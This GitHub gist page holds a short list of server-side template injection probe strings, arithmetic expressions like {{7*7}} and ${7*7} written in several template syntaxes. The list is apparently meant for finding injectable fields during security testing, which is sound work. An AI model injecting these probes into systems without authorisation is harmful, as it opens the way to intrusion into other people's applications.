Created
May 17, 2021 11:47
-
-
Save six2dez/ab5277b11da7369bf4e9db72b49ad3c1 to your computer and use it in GitHub Desktop.
ssti.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssti{{7*7}} | |
| ssti[[7*7]] | |
| ssti{{4+'9'}} | |
| ssti<%= 7 * 7 %> | |
| ssti${7*7} | |
| ssti${{7*7}} | |
| ssti@(40+9) | |
| ssti#{7*7} | |
| ssti#{ 7 * 7 } | |
| ssti<%=%207%20*%207%20%> | |
| ssti#{%207%20*%207%20} | |
| ssti{7*7} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment